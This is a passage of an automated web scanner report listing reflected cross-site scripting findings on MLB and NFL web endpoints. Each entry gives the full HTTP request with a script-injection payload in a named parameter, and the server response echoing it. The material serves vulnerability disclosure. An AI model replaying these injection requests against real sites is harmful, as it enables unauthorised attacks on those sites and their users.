Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; homeObj.drawer.disable=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 147
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:47 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20112f5ba<script>alert(1)</script>8d0bc9b171a

2.137. http://mlb.mlb.com/lookup/named.standings_wild_card_league_repeater.bam [sit_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/named.standings_wild_card_league_repeater.bam

Issue detail

The value of the sit_code request parameter is copied into the HTML document as plain text between tags. The payload caf2e<script>alert(1)</script>d94f6c200b9 was submitted in the sit_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/named.standings_wild_card_league_repeater.bam?sit_code=caf2e<script>alert(1)</script>d94f6c200b9&season=2011&results=5&standings_wild_card.col_in=team_short,file_code,w,l,pct,gb,wild_card&league_id=103&league_id=104 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; homeObj.drawer.disable=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 144
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:44 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: sit_code must be a valid integer value and you passed: caf2e<script>alert(1)</script>d94f6c200b9

2.138. http://mlb.mlb.com/mlb/schedule/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /mlb/schedule/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d672a"><script>alert(1)</script>eb6717e2916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mlb/schedule/?tcid=mm_mlb_schedule&d672a"><script>alert(1)</script>eb6717e2916=1 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=mlbglobal08%2Cmlbcom08%3D%2526pid%253DMajor%252520League%252520Baseball%25253A%252520Stats%25253A%252520Sortable%252520Player%252520Stats%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmlb.mlb.com%25252Fmlb%25252Fschedule%25252F_tcid%25253Dmm_mlb_schedule_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Content-Length: 79050
Cache-Control: max-age=544
Expires: Sun, 02 Oct 2011 23:46:53 GMT
Date: Sun, 02 Oct 2011 23:37:49 GMT
Connection: close
Vary: Accept-Encoding


                           
...[SNIP]...
<link rel="canonical" href="http://mlb.mlb.com/mlb/schedule/?d672a"><script>alert(1)</script>eb6717e2916=1" />
...[SNIP]...

2.139. http://mlb.mlb.com/mlb/schedule/ [tcid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /mlb/schedule/

Issue detail

The value of the tcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85567"><script>alert(1)</script>098ce36d245 was submitted in the tcid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mlb/schedule/?tcid=mm_mlb_schedule85567"><script>alert(1)</script>098ce36d245 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=mlbglobal08%2Cmlbcom08%3D%2526pid%253DMajor%252520League%252520Baseball%25253A%252520Stats%25253A%252520Sortable%252520Player%252520Stats%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmlb.mlb.com%25252Fmlb%25252Fschedule%25252F_tcid%25253Dmm_mlb_schedule_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Content-Length: 79001
Cache-Control: max-age=599
Expires: Sun, 02 Oct 2011 23:47:42 GMT
Date: Sun, 02 Oct 2011 23:37:43 GMT
Connection: close
Vary: Accept-Encoding


                           
...[SNIP]...
<meta property="og:url" content="http://mlb.mlb.com/mlb/schedule/?tcid=mm_mlb_schedule85567"><script>alert(1)</script>098ce36d245&tcid=fb_share" />
...[SNIP]...

2.140. http://mlb.mlb.com/pubajax/wf/flow/stats.splayer [game_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /pubajax/wf/flow/stats.splayer

Issue detail

The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 13484<script>alert(1)</script>d95a9907ac6 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pubajax/wf/flow/stats.splayer?season=2011&sort_order='desc'&sort_column='avg'&stat_type=hitting&page_type=SortablePlayer&game_type=13484<script>alert(1)</script>d95a9907ac6&player_pool=QUALIFIER&season_type=ANY&sport_code='mlb'&results=1000&recSP=1&recPP=50 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 97
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:56:21 GMT
Connection: close

game_type must be a valid integer value and you passed: 13484<script>alert(1)</script>d95a9907ac6

2.141. http://mlb.mlb.com/pubajax/wf/flow/stats.splayer [results parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /pubajax/wf/flow/stats.splayer

Issue detail

The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 7b5ec<script>alert(1)</script>7b6642d4096 was submitted in the results parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pubajax/wf/flow/stats.splayer?season=2011&sort_order='desc'&sort_column='avg'&stat_type=hitting&page_type=SortablePlayer&game_type='D'&player_pool=QUALIFIER&season_type=ANY&sport_code='mlb'&results=10007b5ec<script>alert(1)</script>7b6642d4096&recSP=1&recPP=50 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 100
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:56:29 GMT
Connection: close

results must be a valid integer value and you passed: 10007b5ec<script>alert(1)</script>7b6642d4096

2.142. http://mlb.mlb.com/pubajax/wf/flow/stats.splayer [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /pubajax/wf/flow/stats.splayer

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 6f609<script>alert(1)</script>4c66b5fb60c was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pubajax/wf/flow/stats.splayer?season=20116f609<script>alert(1)</script>4c66b5fb60c&sort_order='desc'&sort_column='avg'&stat_type=hitting&page_type=SortablePlayer&game_type='D'&player_pool=QUALIFIER&season_type=ANY&sport_code='mlb'&results=1000&recSP=1&recPP=50 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 99
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:55:58 GMT
Connection: close

season must be a valid integer value and you passed: 20116f609<script>alert(1)</script>4c66b5fb60c

2.143. http://mlb.mlb.com/stats/sortable.jsp [c_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /stats/sortable.jsp

Issue detail

The value of the c_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6a6"><script>alert(1)</script>f921261e239 was submitted in the c_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stats/sortable.jsp?c_id=mlb2e6a6"><script>alert(1)</script>f921261e239&tcid=mm_mlb_stats HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; homeObj.drawer.disable=true; s_sq=mlbglobal08%2Cmlbcom08%3D%2526pid%253DMajor%252520League%252520Baseball%25253A%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmlb.mlb.com%25252Fstats%25252Fsortable.jsp_c_id%25253Dmlb%252526tcid%25253Dmm_mlb_stats_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Content-Length: 98319
Cache-Control: max-age=7199
Expires: Mon, 03 Oct 2011 00:55:16 GMT
Date: Sun, 02 Oct 2011 22:55:17 GMT
Connection: close
Vary: Accept-Encoding


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<meta property="og:url" content="http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb2e6a6"><script>alert(1)</script>f921261e239&tcid=mm_mlb_stats&tcid=fb_share" />
...[SNIP]...

2.144. http://mlb.mlb.com/stats/sortable.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /stats/sortable.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e21a"><script>alert(1)</script>a485043a9bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats&1e21a"><script>alert(1)</script>a485043a9bc=1 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; homeObj.drawer.disable=true; s_sq=mlbglobal08%2Cmlbcom08%3D%2526pid%253DMajor%252520League%252520Baseball%25253A%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmlb.mlb.com%25252Fstats%25252Fsortable.jsp_c_id%25253Dmlb%252526tcid%25253Dmm_mlb_stats_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Content-Length: 98322
Cache-Control: max-age=7183
Expires: Mon, 03 Oct 2011 00:55:08 GMT
Date: Sun, 02 Oct 2011 22:55:25 GMT
Connection: close
Vary: Accept-Encoding


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<meta property="og:url" content="http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats&1e21a"><script>alert(1)</script>a485043a9bc=1&tcid=fb_share" />
...[SNIP]...

2.145. http://mlb.mlb.com/stats/sortable.jsp [tcid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /stats/sortable.jsp

Issue detail

The value of the tcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2028"><script>alert(1)</script>bbd37b46f6d was submitted in the tcid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_statsb2028"><script>alert(1)</script>bbd37b46f6d HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; homeObj.drawer.disable=true; s_sq=mlbglobal08%2Cmlbcom08%3D%2526pid%253DMajor%252520League%252520Baseball%25253A%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmlb.mlb.com%25252Fstats%25252Fsortable.jsp_c_id%25253Dmlb%252526tcid%25253Dmm_mlb_stats_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Content-Length: 98319
Cache-Control: max-age=7151
Expires: Mon, 03 Oct 2011 00:54:31 GMT
Date: Sun, 02 Oct 2011 22:55:20 GMT
Connection: close
Vary: Accept-Encoding


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<meta property="og:url" content="http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_statsb2028"><script>alert(1)</script>bbd37b46f6d&tcid=fb_share" />
...[SNIP]...

2.146. http://mlb.mlb.com/style/nav_2011.jsp [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The value of the section request parameter is copied into the HTML document as plain text between tags. The payload 4d16f<script>alert(1)</script>e0016a98a3b was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /style/nav_2011.jsp?c_id=mlb&section=homepage4d16f<script>alert(1)</script>e0016a98a3b HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text/css;charset=ISO-8859-1
Content-Length: 17476
Cache-Control: max-age=7179
Expires: Mon, 03 Oct 2011 00:50:29 GMT
Date: Sun, 02 Oct 2011 22:50:50 GMT
Connection: close
Vary: Accept-Encoding


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...
FF), color-stop(57%,#E5E5E5)); /* webkit */filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#FFFFFF', endColorstr='#E5E5E5',GradientType=0 ); /* ie */}

#value-menu li#header_homepage4d16f<script>alert(1)</script>e0016a98a3b a, .dd_navigation li.first:hover, .dd_navigation li.first a:hover, .dd_navigation li.first.vmHover a, .dd_navigation li.first:hover a, .dd_navigation li.first a:focus, .dd_navigation a:active {color:#
...[SNIP]...

2.147. http://pluck.nfl.com/ver1.0/Direct/Jsonp [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.nfl.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 6f6ae<script>alert(1)</script>0d6e0b1f5a4 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22GC55222%22%7D%7D%5D%2C%22UniqueId%22%3A0%2C%22_batchId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback06f6ae<script>alert(1)</script>0d6e0b1f5a4 HTTP/1.1
Host: pluck.nfl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nfl.com/gamecenter/2011100210/2011/REG4/falcons@seahawks
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27447553851633AB-400001A160507934[CE]; nflpollUoF=0_0_1317563204272V0V0V0V0E; userId=la%3D1317598661018; s_pers=%20s_nr%3D1317595944647%7C1320187944647%3B%20s_lastvisit%3D1317598661331%7C1412206661331%3B%20s_pv%3Dnfl%253Agamecenter%253A2011%253Areg4%7C1317600468881%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D-%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL02WSITEMT14proddmlocal
Content-Type: text/javascript; charset=utf-8
Content-Length: 887
Expires: Sun, 02 Oct 2011 23:38:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:38:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL02WSITEMT14proddmlocal; domain=nfl.com; path=/
Set-Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; domain=nfl.com; path=/

RequestBatch.callbacks.daapiCallback06f6ae<script>alert(1)</script>0d6e0b1f5a4({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"10/02/2011 07:37:57:429 PM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"GC55222"},"Section":{"Name":"game center"},"Categories":[{"Name
...[SNIP]...

2.148. http://pluck.nfl.com/ver1.0/daapi2.api [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.nfl.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8f81c<script>alert(1)</script>32c1ecfbe81 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.Discovery.DiscoverContentActionRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Discovery.DiscoverContentActionRequest%22%2C%22Type%22%3A%22Article%22%2C%22Age%22%3A30%2C%22MaximumNumberOfDiscoveries%22%3A10%2C%22Sections%22%3A%5B%7B%22ObjectType%22%3A%22Models.Discovery.DiscoverySection%22%2C%22Name%22%3A%22News%22%7D%5D%2C%22Categories%22%3A%5B%7B%22ObjectType%22%3A%22Models.Discovery.DiscoveryCategory%22%2C%22Name%22%3A%22All%22%7D%5D%2C%22LimitToContributors%22%3A%5B%22All%22%5D%2C%22Activity%22%3A%22Commented%22%7D%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&cb=PluckSDK.jsonpcb('request_0')8f81c<script>alert(1)</script>32c1ecfbe81 HTTP/1.1
Host: pluck.nfl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nfl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1317595812555%7C1320187812555%3B%20s_lastvisit%3D1317595812557%7C1412203812557%3B%20s_pv%3Dnfl%253Ahome%253Alanding%7C1317597612559%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|27447553851633AB-400001A160507934[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: sjl02wsitemt20proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 27633
Cache-Control: private, max-age=10
Expires: Sun, 02 Oct 2011 22:51:06 GMT
Date: Sun, 02 Oct 2011 22:50:56 GMT
Connection: close
Vary: Accept-Encoding

PluckSDK.jsonpcb('request_0')8f81c<script>alert(1)</script>32c1ecfbe81({
"Envelopes": [
{
"PayloadType": "Responses.Discovery.DiscoverContentResponse",
"Payload": {
"Sections": [
{
"Name": "news",
"Objec
...[SNIP]...

2.149. http://pluck.nfl.com/ver1.0/daapi2.api [ctk parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.nfl.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the ctk request parameter is copied into the HTML document as plain text between tags. The payload d6179<script>alert(1)</script>3fec9533353 was submitted in the ctk parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?ctk=id6179<script>alert(1)</script>3fec9533353&crm=1&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822c3e77%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822c38ec%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822c317a%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822c3840%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822c2049%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822c2477%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822c1ba0%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822bf195%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822c043c%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22ObjectType%22%3A%22Models.External.ExternalResourceKey%22%2C%22Key%22%3A%2209000d5d822b722f%22%7D%7D%7D%2C%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.External.ArticleRequest%22%2C%22ArticleKey%22%3A%7B%22Object